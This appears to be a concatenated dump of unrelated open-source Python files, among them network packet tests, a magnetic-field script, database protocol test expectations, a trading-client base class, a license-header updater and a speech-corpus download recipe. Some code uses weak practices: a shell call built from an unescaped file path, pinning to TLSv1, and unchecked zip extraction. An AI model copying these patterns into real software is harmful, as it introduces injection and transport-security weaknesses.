self.update_bpf_map(map_id=0, key="1 1 168 192", value="12 0 0 0 13 0 7 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", frag=0, flags=0) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", frag=13, flags=7) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFlagsTtlTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="13 0 0 0 7 50 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", flags=0, ttl=64) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", flags=7, ttl=50) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFragOffsetSrcTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="14 0 0 0 255 31 0 0 255 255 255 255")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", frag=0) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="255.255.255.255", frag=8191) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
mask.set_do_not_care_scapy(TCP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
|
packages/3d_plotting/examples/compute_field.py
|
zmoon/scipy-lecture-notes
| 2,538 |
70251
|
"""
Helmoltz coils
==============
A script that computes the magnetic field generated by a pair of Helmoltz
coils.
"""
import numpy as np
from scipy import special, linalg
##############################################################################
# Function to caculate the field of a loop
def base_vectors(n):
""" Returns 3 orthognal base vectors, the first one colinear to n.
"""
# normalize n
n = n / np.sqrt(np.square(n).sum(axis=-1))
# choose two vectors perpendicular to n
# choice is arbitrary since the coil is symetric about n
if abs(n[0]) == 1 :
l = np.r_[n[2], 0, -n[0]]
else:
l = np.r_[0, n[2], -n[1]]
l = l / np.sqrt(np.square(l).sum(axis=-1))
m = np.cross(n, l)
return n, l, m
def B_field(r, n, r0, R):
"""
returns the magnetic field from an arbitrary current loop calculated from
eqns (1) and (2) in Phys Rev A Vol. 35, N 4, pp. 1535-1546; 1987.
Parameters
----------
n is normal vector to the plane of the loop at the center, current
is oriented by the right-hand-rule.
r is a position vector where the Bfield is evaluated:
[x1 y2 z3 ; x2 y2 z2 ; ... ]
r is in units of d
r0 is the location of the center of the loop in units of d: [x y z]
R is the radius of the loop
Returns
-------
B is a vector for the B field at point r in inverse units of
(mu I) / (2 pi d)
for I in amps and d in meters and mu = 4 pi * 10^-7 we get Tesla
"""
### Translate the coordinates in the coil's frame
n, l, m = base_vectors(n)
# transformation matrix coil frame to lab frame
trans = np.vstack((l, m, n))
# transformation matrix to lab frame to coil frame
inv_trans = linalg.inv(trans)
r = r - r0 #point location from center of coil
r = np.dot(r, inv_trans) #transform vector to coil frame
#### calculate field
# express the coordinates in polar form
x = r[:, 0]
y = r[:, 1]
z = r[:, 2]
rho = np.sqrt(x**2 + y**2)
theta = np.arctan(x / y)
# NaNs are generated where y is zero.
theta[y == 0] = np.pi / 2
E = special.ellipe((4 * R * rho)/( (R + rho)**2 + z**2))
K = special.ellipk((4 * R * rho)/( (R + rho)**2 + z**2))
dist = ((R - rho)**2 + z**2)
Bz = 1 / np.sqrt((R + rho)**2 + z**2) * (
K
+ E * (R**2 - rho**2 - z**2) / dist
)
Brho = z / (rho*np.sqrt((R + rho)**2 + z**2)) * (
-K
+ E * (R**2 + rho**2 + z**2)/ dist
)
# On the axis of the coil we get a divided by zero here. This returns a
# NaN, where the field is actually zero :
Brho[dist == 0] = 0
Brho[rho == 0] = 0
Bz[dist == 0] = 0
B = np.c_[np.cos(theta)*Brho, np.sin(theta)*Brho, Bz ]
# Rotate the field back in the lab's frame
B = np.dot(B, trans)
return B
##############################################################################
# The grid of points on which we want to evaluate the field
X, Y, Z = np.mgrid[-0.15:0.15:31j, -0.15:0.15:31j, -0.15:0.15:31j]
# Avoid rounding issues :
f = 1e4 # this gives the precision we are interested in:
X = np.round(X * f) / f
Y = np.round(Y * f) / f
Z = np.round(Z * f) / f
# The (x, y, z) position vector
r = np.c_[np.ravel(X), np.ravel(Y), np.ravel(Z)]
##############################################################################
# The coil positions
# The center of the coil
r0 = np.r_[0, 0, 0.1]
# The normal to the coils
n = np.r_[0, 0, 1]
# The radius
R = 0.1
# Add the mirror image of this coils relatively to the xy plane :
r0 = np.vstack((r0, -r0 ))
R = np.r_[R, R]
n = np.vstack((n, n)) # Helmoltz like configuration
##############################################################################
# Calculate field
# First initialize a container matrix for the field vector :
B = np.zeros_like(r)
# Then loop through the different coils and sum the fields :
for this_n, this_r0, this_R in zip(n, r0, R):
this_n = np.array(this_n)
this_r0 = np.array(this_r0)
this_R = np.array(this_R)
B += B_field(r, this_n, this_r0, this_R)
|
tests/licensedcode/data/datadriven/external/fossology-tests/CC/matching.py
|
s4-2/scancode-toolkit
| 1,511 |
70255
|
<gh_stars>1000+
# matching.py - bipartite graph maximum matching algorithms
#
# Copyright 2015 <NAME> <<EMAIL>>.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
#
# This module uses material from the Wikipedia article Hopcroft--Karp algorithm
# <https://en.wikipedia.org/wiki/Hopcroft%E2%80%93Karp_algorithm>, accessed on
# January 3, 2015, which is released under the Creative Commons
# Attribution-Share-Alike License 3.0
# <http://creativecommons.org/licenses/by-sa/3.0/>. That article includes
# pseudocode, which has been translated into the corresponding Python code.
#
# Portions of this module use code from David Eppstein's Python Algorithms and
# Data Structures (PADS) library, which is dedicated to the public domain (for
# proof, see <http://www.ics.uci.edu/~eppstein/PADS/ABOUT-PADS.txt>).
"""Provides functions for computing a maximum cardinality matching in a
bipartite graph.
|
alf/examples/tutorial/off_policy_states_conf.py
|
www2171668/alf
| 175 |
70275
|
# Copyright (c) 2021 Horizon Robotics and ALF Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import torch
import alf
from alf.algorithms.off_policy_algorithm import OffPolicyAlgorithm
from alf.data_structures import AlgStep, LossInfo
from alf.tensor_specs import TensorSpec
class MyOffPolicyAlgorithm(OffPolicyAlgorithm):
def __init__(self,
observation_spec,
action_spec,
reward_spec=None,
env=None,
config=None,
debug_summaries=False):
rollout_state_spec = TensorSpec(shape=(), dtype=torch.int32)
train_state_spec = TensorSpec(shape=(2, ))
super().__init__(
env=env,
config=config,
debug_summaries=debug_summaries,
observation_spec=observation_spec,
action_spec=action_spec,
train_state_spec=train_state_spec,
rollout_state_spec=rollout_state_spec)
def rollout_step(self, inputs, state):
print("rollout_step: ", state)
is_first_steps = inputs.is_first()
is_zero_state = (state == 0)
assert torch.all(is_zero_state[is_first_steps])
return AlgStep(output=inputs.prev_action, state=state - 1)
def train_step(self, inputs, state, rollout_info):
print("train_step: ", state)
return AlgStep(output=inputs.prev_action, state=state + 1)
def calc_loss(self, info):
return LossInfo()
alf.config('create_environment', num_parallel_environments=10)
alf.config(
'TrainerConfig',
algorithm_ctor=MyOffPolicyAlgorithm,
whole_replay_buffer_training=False,
use_rollout_state=False,
mini_batch_length=2,
unroll_length=3,
mini_batch_size=4,
num_updates_per_train_iter=1,
num_iterations=1)
|
Stock/Trade/Broker/WebTrader.py
|
Leonardo-YXH/DevilYuan
| 135 |
70280
|
<reponame>Leonardo-YXH/DevilYuan
import ssl
import random
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.poolmanager import PoolManager
from .DyTrader import *
class Ssl3HttpAdapter(HTTPAdapter):
def init_poolmanager(self, connections, maxsize, block=False):
self.poolmanager = PoolManager(num_pools=connections,
maxsize=maxsize,
block=block,
ssl_version=ssl.PROTOCOL_TLSv1)
class WebTrader(DyTrader):
"""
券商Web交易接口基类
"""
name = 'Web'
heartBeatTimer = 60
pollingCurEntrustTimer = 1
maxRetryNbr = 3 # 最大重试次数
def __init__(self, eventEngine, info, configFile=None, accountConfigFile=None):
super().__init__(eventEngine, info, configFile, accountConfigFile)
self._httpAdapter = None
def _preLogin(self):
# 开始一个会话
self._session = requests.session()
if self._httpAdapter is not None:
self._session.mount('https://', self._httpAdapter())
# session headers
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
}
self._session.headers.update(headers)
def _postLogout(self):
self._session.close()
|
corehq/motech/tests/test_repeater_helpers.py
|
andyasne/commcare-hq
| 471 |
70296
|
<gh_stars>100-1000
from django.test.testcases import TestCase
from mock import patch
from corehq.form_processor.models import CommCareCaseSQL
from datetime import datetime
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors
from corehq.motech.repeater_helpers import get_relevant_case_updates_from_form_json
class TestRepeaterHelpers(TestCase):
def setUp(self):
self.domain = 'test-domain'
self.extra_fields = []
self.form_question_values = {}
case_1_data = {
'case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
'domain': self.domain,
'type': 'paciente',
'name': 'case1',
'owner_id': 'owner_1',
'modified_by': 'modified_by',
}
case_2_data = {
'case_id': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
'domain': self.domain,
'type': 'casa',
'name': 'case2',
'owner_id': 'owner_2',
'modified_by': 'modified_by',
}
self.case_1 = create_commcare_case(case_1_data)
self.case_2 = create_commcare_case(case_2_data)
def tearDown(self):
self.case_1.delete()
self.case_2.delete()
@patch.object(CaseAccessors, 'get_cases')
def test__get_relevant_case_updates_from_form_json_with_case_types(self, get_cases):
get_cases.return_value = [self.case_1, self.case_2]
result = get_relevant_case_updates_from_form_json(
self.domain,
_get_form_json(),
['paciente'],
self.extra_fields
)
self.assertEqual(len(result), 2)
@patch.object(CaseAccessors, 'get_cases')
def test__get_relevant_case_updates_from_form_json_without_case_types(self, get_cases):
get_cases.return_value = [self.case_1, self.case_2]
result = get_relevant_case_updates_from_form_json(
self.domain,
_get_form_json(),
[],
self.extra_fields
)
self.assertEqual(len(result), 3)
def create_commcare_case(data):
cccsql = CommCareCaseSQL(
case_id=data['case_id'],
domain=data['domain'],
type=data['type'],
name=data['name'],
owner_id=data['owner_id'],
modified_by=data['modified_by'],
modified_on=datetime.utcnow(),
server_modified_on=datetime.utcnow(),
)
cccsql.save()
return cccsql
def _get_form_json():
return {'app_id': 'APP_ID',
'archived': False,
'attachments': {
'form.xml': {
'content_type': 'text/xml',
'length': 10975,
'url': 'https://www.commcarehq.org/a/infomovel-pepfar'
'/api/form/attachment/CONFIDENTIAL/form.xml'
}
},
'build_id': 'BUILD_ID',
'domain': 'infomovel-pepfar',
'edited_by_user_id': None,
'edited_on': None,
'form': {'#type': 'data',
'@name': 'SOME NAME',
'@uiVersion': '1',
'@version': 'VERSION',
'@xmlns': 'http://openrosa.org/formdesigner/IDIDID',
'casa_data': {'convivente_cascade': {},
'conviventes_names': {},
'index_cascade': {},
'save_to_case': {'alocar_paciente_casa': {
'case': {'@case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
'@date_modified': '2021-06-24T08:43:06.746000Z',
'@user_id': 'USER ID',
'@xmlns': 'http://commcarehq.org/case/transaction/v2',
'index': {
'parent': {
'#text': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
'@case_type': '',
'@relationship': 'child'
}
}}},
'criar_actualizar_casa': {
'case': {'@case_id': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
'@date_modified': '2021-05-24T08:43:06.746000Z',
'@user_id': 'USER ID',
'@xmlns': 'http://commcarehq.org/case/transaction/v2',
'create': {'case_name': 'CASE NAME',
'case_type': 'casa',
'owner_id': 'owner_1'},
'update': {
'age_range1': '25-30',
'age_range2': '25-30 anos',
}
}}},
'tb_patient_in_household': '0'},
'case': {'@case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
'@date_modified': '2021-06-24T08:43:06.746000Z',
'@user_id': 'USER ID',
'@xmlns': 'http://commcarehq.org/case/transaction/v2',
'update': {'name': '<NAME>'}},
'confirm_info': {},
'confirmar_perfil': {},
'imported_properties': {},
'indicators_v4': {},
'key_workflow_properties': {},
'meta': {},
'patient_data': {}, },
'metadata': {},
}
|
scripts/license.py
|
LiuFang07/bk-cmdb
| 4,695 |
70299
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import getopt
import os
license_content = '''/*
* Tencent is pleased to support the open source community by making 蓝鲸 available.
* Copyright (C) 2017-2018 TH<NAME>, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
'''
def update_license(target_file, temp_file):
print("update: " + target_file)
with open(target_file, 'r') as src_file, open(temp_file, 'w') as tmp_file:
tmp_file.write(license_content)
is_begin = False
for line in src_file.readlines():
if not is_begin and not line.startswith("package"):
continue
is_begin = True
tmp_file.write(line)
os.rename(temp_file, target_file)
os.system("gofmt -w " + temp_file + " > /dev/null 2>&1")
def list_dir(target_dir):
list_dirs = os.walk(target_dir)
for root, _, files in list_dirs:
for f in files:
if f.endswith(".go"):
update_license(root+"/"+f, root+"/#"+f)
def main(argv):
inner_dir = ''
try:
opts, _ = getopt.getopt(argv, "hd:", ["help", "dir="])
except getopt.GetoptError:
print('license.py -d <directory>')
sys.exit(2)
if len(opts) == 0:
print('license.py -d <directory>')
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print('license.py -d <directory>')
sys.exit()
elif opt in ("-d", "--dir"):
inner_dir = arg
list_dir(os.path.abspath(inner_dir))
if __name__ == "__main__":
main(sys.argv[1:])
|
RecoPPS/Local/python/PPSTimingCalibrationModeEnum_cff.py
|
ckamtsikis/cmssw
| 852 |
70319
|
class PPSTimingCalibrationModeEnum:
CondDB = 0
JSON = 1
SQLite = 2
|
httpd.py
|
bshah2016/web-processing
| 250 |
70335
|
#!/usr/bin/env python
PORT = 9914
SERVER = '127.0.0.1'
import SimpleHTTPServer
import BaseHTTPServer
import SocketServer
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
class Server(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
httpd = Server((SERVER, PORT), Handler)
print "Web Server listening on http://%s:%s/ (stop with ctrl+c)..." % (SERVER, PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print "Going down..."
|
unittest/scripts/py_devapi/validation/mysqlx_collection_remove_prepared.py
|
mueller/mysql-shell
| 119 |
70348
|
#@<PROTOCOL> First execution is normal
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
}
#@<OUT> First execution is normal
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Second execution prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 1
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Second execution prepares statement and executes it
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Third execution uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Third execution uses prepared statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> sort() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 1
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
}
#@<OUT> sort() changes statement, back to normal execution
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> second execution after sort(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 2
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> second execution after sort(), prepares statement and executes it
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> third execution after set(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> third execution after set(), uses prepared statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> limit() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 2
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
limit {
row_count: 1
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
}
#@<OUT> limit() changes statement, back to normal execution
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> second execution after limit(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 3
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 0
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> second execution after limit(), prepares statement and executes it
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> third execution after limit(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> third execution after limit(), uses prepared statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Prepares statement to test re-usability of bind() and limit()
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
limit {
row_count: 1
}
args {
type: V_STRING
v_string {
value: "001"
}
}
}
#@<OUT> Prepares statement to test re-usability of bind() and limit()
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Prepares and executes statement
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 4
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 1
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "002"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Prepares and executes statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Executes prepared statement with bind()
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "003"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Executes prepared statement with bind()
Query OK, 1 item affected ([[*]] sec)
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"age": 17,
"name": "james"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Executes prepared statement with limit(1)
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Executes prepared statement with limit(1)
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Executes prepared statement with limit(2)
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> Executes prepared statement with limit(2)
Query OK, 2 items affected ([[*]] sec)
{
"_id": "003",
"age": 18,
"name": "luke"
}
1 document in set ([[*]] sec)
|
python/turbodbc_test/test_data_types.py
|
arikfr/turbodbc
| 537 |
70355
|
import turbodbc.data_types
from turbodbc import STRING, BINARY, NUMBER, DATETIME, ROWID
ALL_TYPE_CODES = [turbodbc.data_types._BOOLEAN_CODE,
turbodbc.data_types._INTEGER_CODE,
turbodbc.data_types._FLOATING_POINT_CODE,
turbodbc.data_types._STRING_CODE,
turbodbc.data_types._UNICODE_CODE,
turbodbc.data_types._TIMESTAMP_CODE,
turbodbc.data_types._DATE_CODE]
ALL_DATA_TYPES = [STRING, BINARY, NUMBER, DATETIME, ROWID]
def test_each_type_code_matches_one_data_type():
for type_code in ALL_TYPE_CODES:
matches = [type for type in ALL_DATA_TYPES if type_code == type]
assert 1 == len(matches)
def test_each_type_code_mismatches_all_but_one_data_type():
for type_code in ALL_TYPE_CODES:
mismatches = [type for type in ALL_DATA_TYPES if type_code != type]
expected = len(ALL_DATA_TYPES) - 1
assert expected == len(mismatches)
|
lhotse/recipes/timit.py
|
stachu86/lhotse
| 353 |
70365
|
<filename>lhotse/recipes/timit.py
#!/usr/bin/env python3
# Copyright 2021 Xiaomi Corporation (Author: <NAME>)
# Apache 2.0
import glob
import logging
import zipfile
from collections import defaultdict
from concurrent.futures.thread import ThreadPoolExecutor
from pathlib import Path
from typing import Dict, Optional, Union
from tqdm import tqdm
from lhotse import validate_recordings_and_supervisions
from lhotse.audio import Recording, RecordingSet
from lhotse.supervision import SupervisionSegment, SupervisionSet
from lhotse.utils import Pathlike, urlretrieve_progress
def download_timit(
target_dir: Pathlike = ".",
force_download: bool = False,
base_url: Optional[str] = "https://data.deepai.org/timit.zip",
) -> None:
"""
Download and unzip the dataset TIMIT.
:param target_dir: Pathlike, the path of the dir to store the dataset.
:param force_download: bool, if True, download the zips no matter if the zips exists.
:param base_url: str, the URL of the TIMIT dataset to download.
"""
target_dir = Path(target_dir)
target_dir.mkdir(parents=True, exist_ok=True)
zip_name = "timit.zip"
zip_path = target_dir / zip_name
corpus_dir = zip_path.with_suffix("")
completed_detector = corpus_dir / ".completed"
if completed_detector.is_file():
logging.info(f"Skipping {zip_name} because {completed_detector} exists.")
return
if force_download or not zip_path.is_file():
urlretrieve_progress(
base_url, filename=zip_path, desc=f"Downloading {zip_name}"
)
with zipfile.ZipFile(zip_path) as zip_file:
corpus_dir.mkdir(parents=True, exist_ok=True)
for names in zip_file.namelist():
zip_file.extract(names, str(corpus_dir))
def prepare_timit(
corpus_dir: Pathlike,
output_dir: Optional[Pathlike] = None,
num_phones: int = 48,
num_jobs: int = 1,
) -> Dict[str, Dict[str, Union[RecordingSet, SupervisionSet]]]:
"""
Returns the manifests which consists of the Recodings and Supervisions.
:param corpus_dir: Pathlike, the path of the data dir.
:param output_dir: Pathlike, the path where to write and save the manifests.
:param num_phones: int=48, the number of phones (60, 48 or 39) for modeling and 48 is regarded as the default value.
:return: a Dict whose key is the dataset part, and the value is Dicts with the keys 'audio' and 'supervisions'.
"""
corpus_dir = Path(corpus_dir)
assert corpus_dir.is_dir(), f"No such directory: {corpus_dir}"
if output_dir is not None:
output_dir = Path(output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
manifests = defaultdict(dict)
dataset_parts = ["TRAIN", "DEV", "TEST"]
phones_dict = {}
if num_phones in [60, 48, 39]:
phones_dict = get_phonemes(num_phones)
else:
raise ValueError("The value of num_phones must be in [60, 48, 39].")
dev_spks, test_spks = get_speakers()
with ThreadPoolExecutor(num_jobs) as ex:
for part in dataset_parts:
wav_files = []
if part == "TRAIN":
print("starting....")
wav_files = glob.glob(str(corpus_dir) + "/TRAIN/*/*/*.WAV")
# filter the SA (dialect sentences)
wav_files = list(
filter(lambda x: x.split("/")[-1][:2] != "SA", wav_files)
)
elif part == "DEV":
wav_files = glob.glob(str(corpus_dir) + "/TEST/*/*/*.WAV")
# filter the SA (dialect sentences)
wav_files = list(
filter(lambda x: x.split("/")[-1][:2] != "SA", wav_files)
)
wav_files = list(
filter(lambda x: x.split("/")[-2].lower() in dev_spks, wav_files)
)
else:
wav_files = glob.glob(str(corpus_dir) + "/TEST/*/*/*.WAV")
# filter the SA (dialect sentences)
wav_files = list(
filter(lambda x: x.split("/")[-1][:2] != "SA", wav_files)
)
wav_files = list(
filter(lambda x: x.split("/")[-2].lower() in test_spks, wav_files)
)
logging.debug(f"{part} dataset manifest generation.")
recordings = []
supervisions = []
for wav_file in tqdm(wav_files):
items = str(wav_file).strip().split("/")
idx = items[-2] + "-" + items[-1][:-4]
speaker = items[-2]
